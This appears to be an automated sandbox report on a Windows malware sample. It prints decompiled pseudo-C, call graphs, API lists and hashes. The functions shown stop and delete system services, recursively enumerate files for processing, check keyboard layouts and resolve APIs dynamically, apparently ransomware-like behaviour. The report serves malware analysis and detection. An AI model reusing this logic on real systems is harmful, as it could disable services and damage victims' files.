9c2931 5286->5287 5292 9c2935 5287->5292 5311 9c5262 GetNativeSystemInfo 5287->5311 5289 9c2967 5290 9c2974 VariantInit 5289->5290 5293 9c29a2 5289->5293 5291 9c299c VariantClear 5290->5291 5291->5293 5293->5292 5294 9c29db SysAllocString 5293->5294 5295 9c2a08 5294->5295 5295->5292 5296 9c2a62 SysAllocString SysAllocString 5295->5296 5298 9c2a92 5296->5298 5297 9c2b5b VariantClear 5297->5298 5298->5292 5298->5297 5299 9c2afb wsprintfW 5298->5299 5300 9c2b4c VariantClear 5298->5300 5299->5300 5301 9c2b1f SysAllocString 5299->5301 5300->5298 5301->5298 5303 9c399d 5302->5303 5304 9c3a03 SysAllocString 5303->5304 5310 9c39a1 5303->5310 5305 9c3a2c SysFreeString 5304->5305 5306 9c3a4f 5305->5306 5305->5310 5307 9c3ad5 SysAllocString SysAllocString 5306->5307 5308 9c3b0d SysFreeString SysFreeString 5307->5308 5309 9c3b26 GetCurrentProcess WaitForSingleObject 5308->5309 5308->5310 5309->5310 5311->5289 5313 9c48f9 GetKeyboardLayoutList 5312->5313 5313->4285 5313->4286 5323 9c1194 5324 9c5c8c 6 API calls 5323->5324 5325 9c11a3 5324->5325 5326 9c5cde 6 API calls 5325->5326 5330 9c11ca 5325->5330 5327 9c11bb 5326->5327 5328 9c47f8 RtlFreeHeap 5327->5328 5329 9c11c3 5328->5329 5329->5330 5331 9c47f8 RtlFreeHeap 5329->5331 5331->5330 5332 9c2c56 5333 9c2c67 5332->5333 5334 9c2c76 5333->5334 5335 9c41bb 3 API calls 5333->5335 5335->5334 5336 9c1091 5337 9c5c8c 6 API calls 5336->5337 5338 9c109f 5337->5338 5339 9c6f12 5342 9c7002 5339->5342 5345 9c4fb9 GetPEB 5342->5345 5344 9c6f1c 5345->5344 5346 9c520e 5347 9c5de2 5346->5347 5348 9c522d CreateMutexW 5347->5348 5349 9c524d RtlGetLastWin32Error 5348->5349 5350 9c525a 5348->5350 5349->5350 5351 9c6f8f 5352 9c7002 GetPEB 5351->5352 5353 9c6f99 5352->5353 4032 9c6d2b 4033 9c6d37 4032->4033 4035 9c6d54 4033->4035 4048 9c707d 4033->4048 4063 9c6f9b 4035->4063 4038 9c6f9b 13 API calls 4039 9c6e01 GetProcAddress 4038->4039 4040 9c6f9b 13 API calls 4039->4040 4041 9c6e16 GetProcAddress 4040->4041 4042 9c6f9b 13 API calls 4041->4042 4043 9c6e2b GetProcAddress 4042->4043 4044 9c6f9b 13 API calls 4043->4044 4045 9c6e40 GetProcAddress 4044->4045 4046 9c6f9b 13 API calls 4045->4046 4047 9c6e55 GetProcAddress 4046->4047 4049 9c70a3 4048->4049 4057 9c6f9b 13 API calls 4049->4057 4067 9c721d 4049->4067 4071 9c7301 4049->4071 4075 9c6ea0 4049->4075 4079 9c6e67 4049->4079 4083 9c728f 4049->4083 4087 9c7256 4049->4087 4091 9c733a 4049->4091 4095 9c6f56 4049->4095 4099 9c6f1e 4049->4099 4050 9c71cb 4050->4033 4051 9c7170 4051->4050 4103 9c6c30 4051->4103 4057->4051 4064 9c6fb5 4063->4064 4117 9c7373 4064->4117 4066 9c6dec GetProcAddress 4066->4038 4068 9c723a 4067->4068 4069 9c707d 12 API calls 4068->4069 4070 9c724f LoadLibraryA 4069->4070 4070->4051 4072 9c731e 4071->4072 4073 9c707d 12 API calls 4072->4073 4074 9c7333 LoadLibraryA 4073->4074 4074->4051 4076 9c6ebd 4075->4076 4077 9c707d 12 API calls 4076->4077 4078 9c6ed2 LoadLibraryA 4077->4078 4078->4051 4080 9c6e84 4079->4080 4081 9c707d 12 API calls 4080->4081 4082 9c6e99 LoadLibraryA 4081->4082 4082->4051 4084 9c72ac 4083->4084 4085 9c707d 12 API calls 4084->4085 4086 9c72c1 LoadLibraryA 4085->4086 4086->4051 4088 9c7273 4087->4088 4089 9c707d 12 API calls 4088->4089 4090 9c7288 LoadLibraryA 4089->4090 4090->4051 4092 9c7357 4091->4092 4093 9c707d 12 API calls 4092->4093 4094 9c736c LoadLibraryA 4093->4094 4094->4051 4096 9c6f73 4095->4096 4097 9c707d 12 API calls 4096->4097 4098 9c6f88 LoadLibraryA 4097->4098 4098->4051 4100 9c6f3a 4099->4100 4101 9c707d 12 API calls 4100->4101 4102 9c6f4f LoadLibraryA 4101->4102 4102->4051 4104 9c707d 11 API calls 4103->4104 4105 9c6c44 LoadLibraryA 4104->4105 4107 9c6c57 4105->4107 4108 9c6c53 4105->4108 4106 9c6c89 lstrcmpA 4106->4107 4109 9c6cbc 4106->4109 4107->4106 4107->4108 4108->4050 4109->4108 4110 9c6c30 11 API calls 4109->4110 4111 9c6cf8 4110->4111 4113 9c47f8 4111->4113 4116 9c4795 RtlFreeHeap 4113->4116 4115 9c4809 4115->4108 4116->4115 4118 9c707d 12 API calls 4117->4118 4119 9c7383 LoadLibraryA 4118->4119 4119->4066 5421 9c3927 5422 9c3932 5421->5422 5423 9c3936 5421->5423 5423->5422 5425 9c78c9 PathFindExtensionW 5423->5425 5426 9c78de 5425->5426 5426->5422 5362 9c10c3 5363 9c5c8c 6 API calls 5362->5363 5364 9c10d2 5363->5364 5365 9c5cde 6 API calls 5364->5365 5368 9c10f2 5364->5368 5366 9c10e7 5365->5366 5367 9c47f8 RtlFreeHeap 5366->5367 5367->5368 5427 9c2d63 5428 9c2d7a 5427->5428 5430 9c2d72 5427->5430 5429 9c2db2 lstrlenW GetWindowsDirectoryW PathAddBackslashW 5428->5429 5428->5430 5429->5430

                                                                                                                                                            Executed Functions

                                                                                                                                                            Function 009C3B8E, Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 141serviceCOMMON
                                                                                                                                                            Download Yara Rule

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            C-Code - Quality: 41%
                                                                                                                                                            			E009C3B8E() {
				char _v8;
				char _v12;
				void* _v16;
				struct _SERVICE_STATUS _v20;
				short** _v24;
				short* _v28;
				void _v56;
				struct _SERVICE_STATUS _v60;
				void* _t28;
				struct _SERVICE_STATUS _t37;
				intOrPtr* _t40;
				struct _SERVICE_STATUS _t43;
				struct _SERVICE_STATUS _t45;
				void* _t46;
				int _t50;
				void* _t58;
				signed int _t63;
				void* _t65;
				short** _t67;
				void* _t71;
				struct _SERVICE_STATUS _t72;
				void* _t74;

				_t72 = 0;
				_t28 = OpenSCManagerW(0, L"ServicesActive", 4); // executed
				_t58 = _t28;
				if(_t58 != 0) {
					_push(0);
					_push(0);
					_v8 = 0;
					_push( &_v12);
					_v12 = 0;
					_push( &_v8);
					_push(0);
					_push(0);
					_push(1);
					_push(0x30);
					_push(0);
					_push(_t58);
					if( *0x9d1208() == 0 || RtlGetLastWin32Error() == 0xea) {
						_t67 = E009C47AB(_v8);
						_v24 = _t67;
						if(_t67 != 0) {
							_push(_t72);
							_push(_t72);
							_push( &_v12);
							_push( &_v8);
							_push(_v8);
							_push(_t67);
							_push(1);
							_push(0x30);
							_push(_t72);
							_push(_t58);
							if( *0x9d1208() == 0) {
								L25:
								CloseServiceHandle(_t58);
								_t37 = _t72;
								L26:
								return _t37;
							}
							_v20 = _t72;
							if(_v12 <= _t72) {
								L24:
								_t72 = 1;
								goto L25;
							} else {
								goto L9;
							}
							do {
								L9:
								_v28 =  *_t67;
								E009C6097( *_t67);
								_t40 =  *0x9d2270; // 0x2dd7b08
								while(1) {
									_v16 = _t40;
									if(_t40 == 0) {
										break;
									}
									if(E009C5E4F( *_t40, _v28) != 0) {
										_t43 = 1;
										L14:
										if(_t43 == 0) {
											goto L19;
										}
										_t46 = OpenServiceW(_t58,  *_t67, 0x10020); // executed
										_t65 = _t46;
										_v16 = _t65;
										if(_t65 == 0) {
											goto L24;
										}
										_t63 = 6;
										_v60 = _t72;
										memset( &_v56, 0, _t63 << 2);
										_t74 = _t74 + 0xc;
										_t50 = ControlService(_t65, 1,  &_v60); // executed
										_t71 = _v16;
										_push(_t71);
										if(_t50 == 0) {
											L23:
											CloseServiceHandle();
											goto L24;
										}
										if(DeleteService() == 0) {
											_push(_t71);
											goto L23;
										}
										_t67 = _v24;
										goto L19;
									}
									_t40 =  *((intOrPtr*)(_v16 + 4));
								}
								_t43 = _t72;
								goto L14;
								L19:
								_t67 =  &(_t67[0xb]);
								_t45 = _v20 + 1;
								_v24 = _t67;
								_v20 = _t45;
							} while (_t45 < _v12);
							goto L24;
						}
						CloseServiceHandle(_t58);
						_t37 = 0;
						goto L26;
					} else {
						CloseServiceHandle(_t58);
						goto L1;
					}
				}
				L1:
				return 0;
			}

























                                                                                                                                                            0x009c3b9d
                                                                                                                                                            0x009c3ba0
                                                                                                                                                            0x009c3ba6
                                                                                                                                                            0x009c3baa
                                                                                                                                                            0x009c3bb3
                                                                                                                                                            0x009c3bb4
                                                                                                                                                            0x009c3bb8
                                                                                                                                                            0x009c3bbb
                                                                                                                                                            0x009c3bbf
                                                                                                                                                            0x009c3bc2
                                                                                                                                                            0x009c3bc3
                                                                                                                                                            0x009c3bc4
                                                                                                                                                            0x009c3bc5
                                                                                                                                                            0x009c3bc7
                                                                                                                                                            0x009c3bc9
                                                                                                                                                            0x009c3bca
                                                                                                                                                            0x009c3bd3
                                                                                                                                                            0x009c3bf3
                                                                                                                                                            0x009c3bf5
                                                                                                                                                            0x009c3bfb
                                                                                                                                                            0x009c3c0b
                                                                                                                                                            0x009c3c0c
                                                                                                                                                            0x009c3c10
                                                                                                                                                            0x009c3c14
                                                                                                                                                            0x009c3c15
                                                                                                                                                            0x009c3c18
                                                                                                                                                            0x009c3c19
                                                                                                                                                            0x009c3c1b
                                                                                                                                                            0x009c3c1d
                                                                                                                                                            0x009c3c1e
                                                                                                                                                            0x009c3c27
                                                                                                                                                            0x009c3cdc
                                                                                                                                                            0x009c3cdd
                                                                                                                                                            0x009c3ce3
                                                                                                                                                            0x009c3ce5
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009c3ce5
                                                                                                                                                            0x009c3c2d
                                                                                                                                                            0x009c3c33
                                                                                                                                                            0x009c3cd9
                                                                                                                                                            0x009c3cdb
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009c3c39
                                                                                                                                                            0x009c3c39
                                                                                                                                                            0x009c3c3c
                                                                                                                                                            0x009c3c3f
                                                                                                                                                            0x009c3c44
                                                                                                                                                            0x009c3c62
                                                                                                                                                            0x009c3c62
                                                                                                                                                            0x009c3c67
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009c3c5a
                                                                                                                                                            0x009c3ccf
                                                                                                                                                            0x009c3c6b
                                                                                                                                                            0x009c3c6d
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009c3c77
                                                                                                                                                            0x009c3c7d
                                                                                                                                                            0x009c3c7f
                                                                                                                                                            0x009c3c84
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009c3c88
                                                                                                                                                            0x009c3c8b
                                                                                                                                                            0x009c3c91
                                                                                                                                                            0x009c3c91
                                                                                                                                                            0x009c3c9a
                                                                                                                                                            0x009c3ca0
                                                                                                                                                            0x009c3ca3
                                                                                                                                                            0x009c3ca6
                                                                                                                                                            0x009c3cd3
                                                                                                                                                            0x009c3cd3
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009c3cd3
                                                                                                                                                            0x009c3cb0
                                                                                                                                                            0x009c3cd2
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009c3cd2
                                                                                                                                                            0x009c3cb2
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009c3cb2
                                                                                                                                                            0x009c3c5f
                                                                                                                                                            0x009c3c5f
                                                                                                                                                            0x009c3c69
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009c3cb5
                                                                                                                                                            0x009c3cb8
                                                                                                                                                            0x009c3cbb
                                                                                                                                                            0x009c3cbc
                                                                                                                                                            0x009c3cbf
                                                                                                                                                            0x009c3cc2
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009c3ccb
                                                                                                                                                            0x009c3bfe
                                                                                                                                                            0x009c3c04
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009c3be1
                                                                                                                                                            0x009c3be2
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009c3be2
                                                                                                                                                            0x009c3bd3
                                                                                                                                                            0x009c3bac
                                                                                                                                                            0x00000000

                                                                                                                                                            APIs
                                                                                                                                                            • OpenSCManagerW.SECHOST(00000000,ServicesActive,00000004,00000000), ref: 009C3BA0
                                                                                                                                                            • EnumServicesStatusExW.ADVAPI32(00000000,00000000,00000030,00000001,00000000,00000000,?,?,00000000,00000000), ref: 009C3BCB
                                                                                                                                                            • RtlGetLastWin32Error.NTDLL ref: 009C3BD5
                                                                                                                                                            • CloseServiceHandle.ADVAPI32(00000000), ref: 009C3BE2
                                                                                                                                                              • Part of subcall function 009C47AB: HeapCreate.KERNEL32(00000000,00400000,00000000,?,009C1C60,?,?,009C150C), ref: 009C47C0
                                                                                                                                                              • Part of subcall function 009C47AB: GetProcessHeap.KERNEL32(?,009C1C60,?,?,009C150C), ref: 009C47CF
                                                                                                                                                            • CloseServiceHandle.ADVAPI32(00000000,00000000), ref: 009C3BFE
                                                                                                                                                            • EnumServicesStatusExW.ADVAPI32(00000000,00000000,00000030,00000001,00000000,?,?,?,00000000,00000000,00000000), ref: 009C3C1F
                                                                                                                                                            • OpenServiceW.ADVAPI32(00000000,00000000,00010020), ref: 009C3C77
                                                                                                                                                            • ControlService.ADVAPI32(00000000,00000001,?), ref: 009C3C9A
                                                                                                                                                            • DeleteService.ADVAPI32(?), ref: 009C3CA8
                                                                                                                                                            • CloseServiceHandle.ADVAPI32(00000000), ref: 009C3CDD
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.596611084.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.596591491.00000000009C0000.00000002.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596642777.00000000009CD000.00000002.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596664052.00000000009D0000.00000004.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596690812.00000000009D3000.00000008.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596720612.00000000009E0000.00000002.00020000.sdmp Download File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_9c0000_tS9P6wPz9x.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Service$CloseHandle$EnumHeapOpenServicesStatus$ControlCreateDeleteErrorLastManagerProcessWin32
                                                                                                                                                            • String ID: ServicesActive
                                                                                                                                                            • API String ID: 2778422472-3071072050
                                                                                                                                                            • Opcode ID: 1300ecb7af655f9334a14420c89ecdd0f3b9f1ade61b2ac4767e353af0936351
                                                                                                                                                            • Instruction ID: a285d896285ce298b0cb21f0e2149afb0df698949d6e7ff39a0a092e9fbccc85
                                                                                                                                                            • Opcode Fuzzy Hash: 1300ecb7af655f9334a14420c89ecdd0f3b9f1ade61b2ac4767e353af0936351
                                                                                                                                                            • Instruction Fuzzy Hash: 2141BF72E45215BBDB109BA5DC44FAF7BBCEF48750F10C41AF902F2250DB319A40DA61
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 009C761A, Relevance: 6.2, APIs: 4, Instructions: 193COMMON
                                                                                                                                                            Download Yara Rule

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            • Executed
                                                                                                                                                            • Not Executed
                                                                                                                                                            control_flow_graph 349 9c761a-9c7645 351 9c781b-9c781e 349->351 352 9c764b-9c765a call 9c78f4 call 9c2d28 349->352 354 9c766b-9c7671 351->354 355 9c7824 351->355 365 9c765d-9c7666 352->365 357 9c76b2-9c76b4 354->357 358 9c7673-9c76a7 call 9c61a7 call 9c47f8 * 2 354->358 359 9c783a-9c783c 355->359 357->359 363 9c76ba-9c76e5 call 9c6250 call 9c60c5 call 9c5387 357->363 381 9c76ac-9c76b1 358->381 382 9c76a9 358->382 360 9c783e-9c7844 359->360 361 9c7826-9c7839 call 9c47f8 * 2 359->361 361->359 383 9c76f9-9c76fb FindFirstFileW 363->383 384 9c76e7-9c76f7 FindFirstFileExW 363->384 369 9c7818 365->369 369->351 381->357 382->381 385 9c7701-9c7707 383->385 384->385 385->351 386 9c770d 385->386 387 9c770f-9c7724 call 9c6146 386->387 390 9c772a-9c773f call 9c6146 387->390 391 9c77f6-9c77f9 387->391 390->391 396 9c7745-9c774f 390->396 392 9c77fb-9c780b FindNextFileW 391->392 393 9c7811-9c7812 FindClose 391->393 392->387 392->393 393->369 396->391 397 9c7755-9c7771 call 9c61a7 396->397 400 9c77b3-9c77d7 397->400 401 9c7773-9c778e call 9c60c5 397->401 400->391 405 9c77d9-9c77ea call 9c38bf 400->405 401->391 408 9c7790-9c77a5 call 9c78f4 call 9c2d28 401->408 407 9c77ed-9c77f3 405->407 407->391 411 9c77a8-9c77b1 408->411 411->391
                                                                                                                                                            C-Code - Quality: 79%
                                                                                                                                                            			E009C761A(WCHAR* _a4, int _a8) {
				signed int _v8;
				intOrPtr* _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				struct _WIN32_FIND_DATAW _v620;
				int _t66;
				signed int _t68;
				void* _t70;
				signed int _t73;
				int _t75;
				signed int _t77;
				intOrPtr _t82;
				signed int _t84;
				void* _t86;
				signed int _t89;
				void* _t93;
				signed int _t98;
				signed int _t99;
				intOrPtr* _t103;
				void* _t104;
				signed int _t112;
				int _t119;
				signed int* _t120;
				WCHAR* _t121;
				intOrPtr* _t122;
				intOrPtr* _t123;
				intOrPtr* _t124;

				_t121 = _a4;
				_t120 = _a8;
				_t103 = 0;
				_v8 = 0;
				_v12 = 0;
				_v20 = 0;
				_v16 = 0;
				_t120[1](_t121, 0);
				if(0 == 0) {
					goto L24;
				} else {
					E009C78F4( &_v20, _t121);
					_t9 =  &(_t120[3]); // 0x9777af8, executed
					_t66 = _t120[0xa]( *_t9, _t121, 0);
					_t124 = _t124 + 0x14;
					_t120[6] = _t120[6] + _t66;
					asm("adc [edi+0x1c], edx");
					L23:
					_t103 = _v12;
					L24:
					while( *_t120 == 0) {
						_t66 = _v20 | _v16;
						__eflags = _t66;
						if(_t66 != 0) {
							E009C61A7(_t121,  *_t103);
							_t123 = _t103;
							_t103 =  *((intOrPtr*)(_t103 + 4));
							_v12 = _t103;
							E009C47F8( *_t123);
							E009C47F8(_t123);
							_t124 = _t124 + 0x10;
							_t112 = _v16;
							_t98 = _v20 + 0xffffffff;
							_v20 = _t98;
							asm("adc ecx, 0xffffffff");
							_t99 = _t98 | _t112;
							__eflags = _t99;
							_v16 = _t112;
							if(_t99 == 0) {
								_t21 =  &_v8;
								 *_t21 = _v8 & _t99;
								__eflags =  *_t21;
							}
							_t121 = _a4;
							_t66 = 1;
							__eflags = 1;
						}
						__eflags = _t66;
						if(_t66 == 0) {
							L27:
							while(_t103 != 0) {
								_t122 = _t103;
								_t103 =  *((intOrPtr*)(_t103 + 4));
								E009C47F8( *_t122);
								_t66 = E009C47F8(_t122);
							}
							return _t66;
						}
						_t68 = E009C6250(_t121);
						 *_t124 = 0x9cd2e8;
						_push(_t121);
						_v24 = _t68;
						E009C60C5(__eflags);
						_t70 = E009C5387();
						__eflags = _t70 - 0x601;
						if(_t70 < 0x601) {
							_t66 = FindFirstFileW(_t121,  &_v620);
						} else {
							_t66 = FindFirstFileExW(_t121, 1,  &_v620, 0, 0, 2); // executed
						}
						_a8 = _t66;
						__eflags = _t66 - 0xffffffff;
						if(_t66 == 0xffffffff) {
							continue;
						} else {
							_t104 = _t66;
							while(1) {
								_t73 = E009C6146( &(_v620.cFileName), ".");
								__eflags = _t73;
								if(_t73 != 0) {
									_t77 = E009C6146( &(_v620.cFileName), 0x9cd2e0);
									__eflags = _t77;
									if(_t77 != 0) {
										__eflags = _v620.dwFileAttributes & 0x00000400;
										if((_v620.dwFileAttributes & 0x00000400) == 0) {
											E009C61A7( &(_t121[_v24]),  &(_v620.cFileName));
											__eflags = _v620.dwFileAttributes & 0x00000010;
											if(__eflags == 0) {
												_t119 = _v620.nFileSizeHigh;
												_t82 = _v620.nFileSizeLow;
												_v28 = _t82;
												_a8 = _t119;
												_t84 = _t120[2](_t121,  &(_v620.cFileName), _t82, _t119);
												_t124 = _t124 + 0x10;
												__eflags = _t84;
												if(_t84 != 0) {
													_t56 =  &(_t120[4]); // 0xffdf25, executed
													_t86 = _t120[0xb]( *_t56, _t121,  &(_v620.cFileName), _v28, _a8);
													_t124 = _t124 + 0x14;
													_t120[8] = _t120[8] + _t86;
													asm("adc [edi+0x24], edx");
												}
											} else {
												E009C60C5(__eflags, _t121, 0x9cd2ec);
												_t89 = _t120[1](_t121,  &(_v620.cFileName));
												_t124 = _t124 + 0x10;
												__eflags = _t89;
												if(_t89 != 0) {
													E009C78F4( &_v20, _t121);
													_t43 =  &(_t120[3]); // 0x9777af8, executed
													_t93 = _t120[0xa]( *_t43, _t121,  &(_v620.cFileName));
													_t124 = _t124 + 0x14;
													_t120[6] = _t120[6] + _t93;
													asm("adc [edi+0x1c], edx");
												}
											}
										}
									}
								}
								__eflags =  *_t120;
								if( *_t120 != 0) {
									break;
								}
								_t75 = FindNextFileW(_t104,  &_v620); // executed
								__eflags = _t75;
								if(_t75 != 0) {
									continue;
								}
								break;
							}
							_t66 = FindClose(_t104);
							goto L23;
						}
					}
					goto L27;
				}
			}
































                                                                                                                                                            0x009c7625
                                                                                                                                                            0x009c762b
                                                                                                                                                            0x009c762e
                                                                                                                                                            0x009c7632
                                                                                                                                                            0x009c7635
                                                                                                                                                            0x009c7638
                                                                                                                                                            0x009c763b
                                                                                                                                                            0x009c763e
                                                                                                                                                            0x009c7645
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009c764b
                                                                                                                                                            0x009c7650
                                                                                                                                                            0x009c7657
                                                                                                                                                            0x009c765a
                                                                                                                                                            0x009c765d
                                                                                                                                                            0x009c7660
                                                                                                                                                            0x009c7663
                                                                                                                                                            0x009c7818
                                                                                                                                                            0x009c7818
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009c781b
                                                                                                                                                            0x009c766e
                                                                                                                                                            0x009c766e
                                                                                                                                                            0x009c7671
                                                                                                                                                            0x009c7676
                                                                                                                                                            0x009c767b
                                                                                                                                                            0x009c767d
                                                                                                                                                            0x009c7680
                                                                                                                                                            0x009c7685
                                                                                                                                                            0x009c768b
                                                                                                                                                            0x009c7693
                                                                                                                                                            0x009c7696
                                                                                                                                                            0x009c7699
                                                                                                                                                            0x009c769c
                                                                                                                                                            0x009c769f
                                                                                                                                                            0x009c76a2
                                                                                                                                                            0x009c76a2
                                                                                                                                                            0x009c76a4
                                                                                                                                                            0x009c76a7
                                                                                                                                                            0x009c76a9
                                                                                                                                                            0x009c76a9
                                                                                                                                                            0x009c76a9
                                                                                                                                                            0x009c76a9
                                                                                                                                                            0x009c76ac
                                                                                                                                                            0x009c76b1
                                                                                                                                                            0x009c76b1
                                                                                                                                                            0x009c76b1
                                                                                                                                                            0x009c76b2
                                                                                                                                                            0x009c76b4
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009c783a
                                                                                                                                                            0x009c7826
                                                                                                                                                            0x009c7828
                                                                                                                                                            0x009c782d
                                                                                                                                                            0x009c7833
                                                                                                                                                            0x009c7839
                                                                                                                                                            0x009c7844
                                                                                                                                                            0x009c7844
                                                                                                                                                            0x009c76bb
                                                                                                                                                            0x009c76c0
                                                                                                                                                            0x009c76c7
                                                                                                                                                            0x009c76c8
                                                                                                                                                            0x009c76cb
                                                                                                                                                            0x009c76d2
                                                                                                                                                            0x009c76dc
                                                                                                                                                            0x009c76e5
                                                                                                                                                            0x009c76fb
                                                                                                                                                            0x009c76e7
                                                                                                                                                            0x009c76f1
                                                                                                                                                            0x009c76f1
                                                                                                                                                            0x009c7701
                                                                                                                                                            0x009c7704
                                                                                                                                                            0x009c7707
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009c770d
                                                                                                                                                            0x009c770d
                                                                                                                                                            0x009c770f
                                                                                                                                                            0x009c771b
                                                                                                                                                            0x009c7722
                                                                                                                                                            0x009c7724
                                                                                                                                                            0x009c7736
                                                                                                                                                            0x009c773d
                                                                                                                                                            0x009c773f
                                                                                                                                                            0x009c7745
                                                                                                                                                            0x009c774f
                                                                                                                                                            0x009c7763
                                                                                                                                                            0x009c7768
                                                                                                                                                            0x009c7771
                                                                                                                                                            0x009c77b3
                                                                                                                                                            0x009c77b9
                                                                                                                                                            0x009c77c1
                                                                                                                                                            0x009c77cc
                                                                                                                                                            0x009c77cf
                                                                                                                                                            0x009c77d2
                                                                                                                                                            0x009c77d5
                                                                                                                                                            0x009c77d7
                                                                                                                                                            0x009c77e7
                                                                                                                                                            0x009c77ea
                                                                                                                                                            0x009c77ed
                                                                                                                                                            0x009c77f0
                                                                                                                                                            0x009c77f3
                                                                                                                                                            0x009c77f3
                                                                                                                                                            0x009c7773
                                                                                                                                                            0x009c7779
                                                                                                                                                            0x009c7786
                                                                                                                                                            0x009c7789
                                                                                                                                                            0x009c778c
                                                                                                                                                            0x009c778e
                                                                                                                                                            0x009c7795
                                                                                                                                                            0x009c77a2
                                                                                                                                                            0x009c77a5
                                                                                                                                                            0x009c77a8
                                                                                                                                                            0x009c77ab
                                                                                                                                                            0x009c77ae
                                                                                                                                                            0x009c77ae
                                                                                                                                                            0x009c778e
                                                                                                                                                            0x009c7771
                                                                                                                                                            0x009c774f
                                                                                                                                                            0x009c773f
                                                                                                                                                            0x009c77f6
                                                                                                                                                            0x009c77f9
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009c7803
                                                                                                                                                            0x009c7809
                                                                                                                                                            0x009c780b
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009c780b
                                                                                                                                                            0x009c7812
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009c7812
                                                                                                                                                            0x009c7707
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009c7824

                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.596611084.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.596591491.00000000009C0000.00000002.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596642777.00000000009CD000.00000002.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596664052.00000000009D0000.00000004.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596690812.00000000009D3000.00000008.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596720612.00000000009E0000.00000002.00020000.sdmp Download File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_9c0000_tS9P6wPz9x.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 8fc5f4e5d377e6339153ef74c9cf455aa6fb9f055941c9602cfc18f60f329563
                                                                                                                                                            • Instruction ID: b0eb6f3323695a38a0432c949a3feb559e9b4303ed37b5e3a0c4217e265776e5
                                                                                                                                                            • Opcode Fuzzy Hash: 8fc5f4e5d377e6339153ef74c9cf455aa6fb9f055941c9602cfc18f60f329563
                                                                                                                                                            • Instruction Fuzzy Hash: 6C618071D0461AABDB10AFA4CC89FAEB7BCFF05320F50456AF914E2141E7359A50CFA2
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 009C5907, Relevance: 6.0, APIs: 4, Instructions: 12timesleepCOMMON
                                                                                                                                                            Download Yara Rule

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            • Executed
                                                                                                                                                            • Not Executed
                                                                                                                                                            control_flow_graph 509 9c5907-9c5916 timeBeginPeriod timeGetTime 510 9c5918-9c5928 Sleep timeGetTime 509->510 510->510 511 9c592a-9c592b 510->511
                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                            			E009C5907() {
				long _t3;
				long _t4;

				timeBeginPeriod(1);
				_t4 = timeGetTime();
				do {
					Sleep(1); // executed
					_t3 = timeGetTime();
				} while (_t4 == _t3);
				return _t3;
			}





                                                                                                                                                            0x009c590a
                                                                                                                                                            0x009c5916
                                                                                                                                                            0x009c5918
                                                                                                                                                            0x009c591a
                                                                                                                                                            0x009c5920
                                                                                                                                                            0x009c5926
                                                                                                                                                            0x009c592b

                                                                                                                                                            APIs
                                                                                                                                                            • timeBeginPeriod.WINMM(00000001,?,009C5873,00000000,00000000,00000000,?,00000030,00000000,?,?,009C67D8,?,00000020,00000000), ref: 009C590A
                                                                                                                                                            • timeGetTime.WINMM(?,009C67D8,?,00000020,00000000,?,009C6781,?,?,009C24CB,?,009D2120), ref: 009C5910
                                                                                                                                                            • Sleep.KERNEL32(00000001,?,009C67D8,?,00000020,00000000,?,009C6781,?,?,009C24CB,?,009D2120), ref: 009C591A
                                                                                                                                                            • timeGetTime.WINMM(?,009C67D8,?,00000020,00000000,?,009C6781,?,?,009C24CB,?,009D2120), ref: 009C5920
                                                                                                                                                            Memory Dump Source
